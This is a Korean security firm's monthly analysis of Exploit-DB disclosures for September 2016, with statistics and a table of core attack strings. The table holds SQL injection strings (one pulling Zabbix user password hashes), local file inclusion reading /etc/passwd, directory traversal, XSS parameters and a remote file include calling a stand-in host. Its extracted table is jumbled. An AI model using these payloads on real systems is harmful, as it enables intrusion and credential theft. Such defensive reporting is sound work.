EDB 분석 보고서 (2016.09) 2016.09.01~2016.09.30 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.

분석 내용 정리 (작성: 펜타시큐리티시스템 보안성평가팀) 2016년 9월에 공개된 Exploit-DB의 분석 결과, Cross Site Scripting 공격에 대한 취약점 보고 개수가 가장 많았습니다. 발견된 Cross Site Scripting 공격들의 대부분은 오픈소스 아이피 관리 시스템인 PHPIPAM에서 발견되었습니다. PHPIPAM 에서 발견된 공격들을 분석해보면, 파라미터 값을 변조하여 스크립트를 삽입하는 단순한 공격들의 형태가 대부분이었습니다. SQL Injection 공격 역시 PHPIAM에 서 발견되었는데, 이 역시 공격의 위험도와 난이도가 높은 형태들의 공격은 아니었습니다. 그러나, 취약점이 발견된 페이지가 상당히 많고 추가적인 공격에 노출될 수 있으므로 PHPIPAM을 사용하는 관리자는 시큐어코딩 및 보안업데이트가 필요해 보입니다. 또한, 이번 달에는 Exponent CMS에서 특이한 SQL Injection 취약점이 발견되었습니다. 대부분의 SQL Injection 공격은 Parameter의 value를 노리게 되는 데, 이번에 발견된 취약점은 일반적인 Parameter key, value의 구조가 아닌 URL경로에 공격하는 패턴이었습니다. 이는 일반적으로는 성공이 되지 않는 취약점이지만 사이트의 구조에 따라 얼마든지 공격이 성공할 수 있는 취약점입니다. Exponent CMS와 마찬가지로 사이트가 URL 경로를 이용해서 어떠한 행위를 한다면 반드시 주의해야 될 부분이므로 관련 공격코드를 참고하여 취약점에 노출되지 않도록 주의 해야 합니다.

30 1. 취약점 별 보고 개수 취약점 별 보고 개수 26 취약점 보고 개수 25 LFI 1 RFI 1 20 Directory Traversal 1 SQL Injection 7 15 XSS 26 총합계 36 10 7

5 1 1 1 0 LFI RFI Directory Traversal SQL Injection XSS

2. 위험도별 분류 위험도 별 분류 위험도 보고 개수 백분율 상 2 5.56% 2 중 34 94.44% 합계 36 100.00% 상 중

34

3. 공격 난이도 별 현황 공격 난이도 보고 개수 백분율 공격 난이도 별 현황 상 2 5.56% 중 1 2.78% 하 33 91.67% 2 1 총합계 36 100.00% 상 중 하

33

4. 주요 소프트웨어 별 취약점 발생 현황 소프트웨어 이름 보고개수 주요 소프트웨어 별 취약점 발생 현황 PHPIPAM 23 Kajona 3 Jobberbase 2 1 1 1 PHPIPAM 2 1 Wordpress 1 1 Kajona 1 Matrimonial Website Script 1 Jobberbase Exponent CMS 1 2 Joomla Zabbix 1 Wordpress 2 AnoBBS 1 Matrimonial Website Script CumulusClips 1 Exponent CMS 3 총합계 36 23 Zabbix AnoBBS CumulusClips EDB 분석 보고서 (2016.09)

2016.09.01~2016.09.30 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다. 날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경 WordPress RB Agency Plugin /wp-content/plugins/rb- WordPress RB 2016-09-05 40333 LFI 하 중 2.4.7 - forcedownload. LFI agency/ext/forcedownload.php?file=../../../../../../../../etc/pass Wordpress Agency Plugin 취약점 wd 2.4.7 POST /phpipam/app/tools/user-menu/user-edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - user-edit.php Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 SQL Injection 하 중 PHPIPAM SQL Injection 취약점 1.2.1 real_name=phpIPAM+Admin&email=admin%40domain.loc al&password1=&password2=&mailNotify=No&mailChang elog=No&printLimit=30&lang=9'%20or%201=1-- POST /phpipam/app/admin/subnets/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/subnets/e PHPIPAM 1.2.1 dit.php XSS 취약점 sectionId=2&subnetId=1&action=edit"> POST /phpipam/app/admin/widgets/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/widgets/e PHPIPAM 1.2.1 dit.php XSS 취약점 wid=1"> &action=edit POST /phpipam/app/admin/scan-agents/edit.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/scan- Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 agents/edit.php XSS 취약점 id=1&action=edit"> POST /phpipam/app/admin/groups/edit-group.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/groups/ed Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 it-group.php XSS 취약점 id=2">&a ction=edit POST /phpipam/app/admin/users/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/users/edit. PHPIPAM 1.2.1 php XSS 취약점 id=1&action=edit"> POST /phpipam/app/admin/tags/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/tags/edit. PHPIPAM 1.2.1 php XSS 취약점 id=1&action=edit"> POST /phpipam/app/admin/instructions/preview.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/instruction Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 s/preview.php XSS 취약점 instructions=You+can+write+instructions+under+admin+ menu!"> POST /phpipam/app/admin/languages/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/sections/e PHPIPAM 1.2.1 dit.php XSS 취약점 sectionId=2">&location=IPaddresses

POST /phpipam/app/admin/devices/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/devices/e PHPIPAM 1.2.1 dit.php XSS 취약점 switchId=1&action=edit"> POST /phpipam/app/admin/device-types/edit.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/device- Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 types/edit.php XSS 취약점 tid=1&action=edit"> EDB 분석 보고서 (2016.09)

2016.09.01~2016.09.30 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다. 날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경 POST /phpipam/app/admin/vlans/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/vlans/edit. PHPIPAM 1.2.1 php XSS 취약점 vlanId=1">&action=edit&vlanNum= POST /phpipam/app/admin/vlans/edit-domain.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/vlans/edit- Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 domain.php XSS 취약점 id=">&ac tion=add POST /phpipam/app/admin/nameservers/edit.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/nameserv Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 ers/edit.php XSS 취약점 nameserverId=1"> POST /phpipam/app/admin/replace-fields/result.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/replace- PHPIPAM 1.2.1 fields/result.php XSS 취약점 field=description"> POST /phpipam/app/admin/subnets/edit-folder.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/subnets/e Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 dit-folder.php XSS 취약점 sectionId=2&subnetId=">&action=add&location=IPaddresses POST /phpipam/app/tools/devices/devices-print.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/tools/devices/dev Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 ices-print.php XSS 취약점 ffield=hostname"> /phpipam/?page=tools§ion=changelog&subnetId=a& PHPIPAM 1.2.1 - /phpipam/ XSS PHPIPAM 2016-09-06 40338 XSS 하 중 sPage=50"> jsrpc.php?sid=0bcd4ade648214dc&type=9&method=scree n.get×tamp=1471403798083&mode=2&screenid=& groupid=&hostid=0&pageFile=history.php&profileIdx=web .item.graph&profileIdx2=%28select%201%20from%20%28s elect%20count%28%2A%29%2Cconcat%28%28select%28se lect%20concat%28cast%28concat%28alias%2C0x7e%2Cpas swd%2C0x7e%29%20as%20char%29%2C0x7e%29%29%20f Zabbix 2.0 - 3.0.3 - SQL 2016-09-08 40353 SQL Injection 상 상 rom%20zabbix.users%20LIMIT%20%22%2Bstr%28userid- Zabbix Zabbix 2.0 Injection 1%29%2B%22%2C1%29%2Cfloor%28rand%280%29%2A2% 29%29x%20from%20information_schema.tables%20group %20by%20x%29a%29&updateProfile=true&screenitemid= &period=3600&stime=20160817050632&resourcetype=17 &itemids[23297]=23297&action=showlatest&filter=&filter_ task=&mark_color=1

POST /progs/bbs_auth.php?prog_dir=http://hack.com/index.php HTTP/1.1 Host: AnoBBS 1.0.1 - bbs_auth.php RFI User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 2016-09-16 40388 RFI 하 중 AnoBBS AnoBBS 1.0.1 취약점 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 /kajona/xml.php?admin=1&module=messaging&action=sa veConfigAjax&systemid=&class_messageprovider_exceptio ns_enabled=false<%2fa>&messageprovidertype=cl ass_messageprovider_exceptions Directory Kajona 4.7 - image.php /kajona/image.php?image=/files/images/upload/....//....//..../ 2016-09-19 40395 하 중 Kajona Kajona 4.7 Traversal Directory Traversal 취약점 /download.php&maxWidth=20&maxHeight=2 Kajona 4.7 - index.php XSS 취약 /kajona/index.php?admin=1&module=search&action=sear 2016-09-19 40395 XSS 하 중 Kajona Kajona 4.7 점 ch&peClose=1&peRefreshPage=';alert(1);foo=' Exponent CMS 2.3.9 - index.php /exponent/index.php'%20or%201%3d1--%20 Exponent Exponent CMS 2016-09-22 40412 SQL Injection 중 중 SQL Injection 취약점 CMS 2.3.9 /index.php?option=com_eventbooking&view=calendar&lay Joomla Joomla Component Huge-IT out=weekly&date=1%20or%201=1--&Itemid=354 Component 2016-09-22 40413 SQL Injection 하 중 Video Gallery 1.0.9 - index.php Joomla Huge-IT Video SQL Injection 취약점 Gallery 1.0.9

/viewfullprofile1.php?id=MM57711%20and%20%2F*%2130 000if%28exists%28select%20concat%280x7233646D307633 Matrimonial Website Script 1.0.2 Matrimonial 5F73716C5F696E6A656374696F6E%2Ccount%28*%29%29 Matrimonial 2016-09-22 40416 SQL Injection 상 상 - viewfullprofile1.php SQL Website Script %20from%20%3F%3F%3F.%E7%AE%A1%E7%90%86%E5%9 Website Script Injection 취약점 1.0.2 1%98%29%2CBENCHMARK%281161102%2C8%2CMD5%2 80x41%29%29%2C0%29*%2F /index.php?option=com_eventbooking&view=calendar&lay Joomla! Joomla! Component Event out=weekly&date=1%20or%201=1--&Itemid=354 Component 2016-09-26 40423 SQL Injection 하 중 Booking 2.10.1 - index.php SQL Joomla Event Booking Injection 취약점 2.10.1